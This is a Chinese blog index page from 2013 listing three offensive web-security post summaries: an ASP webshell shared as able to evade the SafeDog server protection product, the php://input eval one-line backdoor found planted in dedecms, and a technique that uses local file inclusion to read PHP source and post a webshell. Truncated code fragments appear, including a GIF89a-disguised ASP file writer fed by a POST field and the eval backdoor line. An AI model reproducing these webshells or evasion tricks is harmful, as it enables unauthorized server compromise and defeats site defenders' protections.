2013年10月23日

asp过安全狗的webshell

摘要: 安全狗介绍:网站安全狗是安全狗互联网安全实验室研发的一款服务器安全防护软件。也是很多小黑们的拦路虎,眼中钉。今天与大家分享的是一枚能过安全狗的asp shell.GIF89a$ ;"" thenset fs=server.CreateObject("scripting.filesystemobject")set thisfile=fs.CreateTextFile(testfile,True)thisfile.Write(""&Request.form("1988") & "") 阅读全文

posted @ 2013-10-23 03:31 =_=! 阅读(279) 评论(0) 推荐(0) 编辑

php://input,php://filter,data URI schema的那些事

摘要: 一、php://input一句话木马在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)@eval(file_get_contents(‘php://input’))我是个十足的php菜鸟,只有用到的时候才会去查查语法书,对php://input也只是有点印象而已,于是用脚本phpinput.php,配合firefox Hackbar插件测试了一下php://input的功能1";4//@eval(file_get_contents('php://i 阅读全文

posted @ 2013-10-23 03:22 =_=! 阅读(444) 评论(0) 推荐(0) 编辑

php LFI读php文件源码以及直接post webshell

摘要: 假设如下一个场景(1) http://vulnerable/fileincl/example1.php?page=intro.php(该php文件包含LFI漏洞)(2) 但是你没有地方可以upload你的webshell代码(3) LFI只能读取到非php文件的源码(因为无法解析执行 只能被爆菊花)(4) 如果你能读取到config.php之类文件 或许可以直接拿到数据库账号远程入侵进去【现在的问题是】LFI如何读取到php文件的源码?于是给大家做个演示如果我正常用LFI去读/sqli/db.php文件是无法读取它的源码它会被当做php文件被执行1http://vulnerable/filei 阅读全文

posted @ 2013-10-23 03:19 =_=! 阅读(1478) 评论(0) 推荐(0) 编辑

导航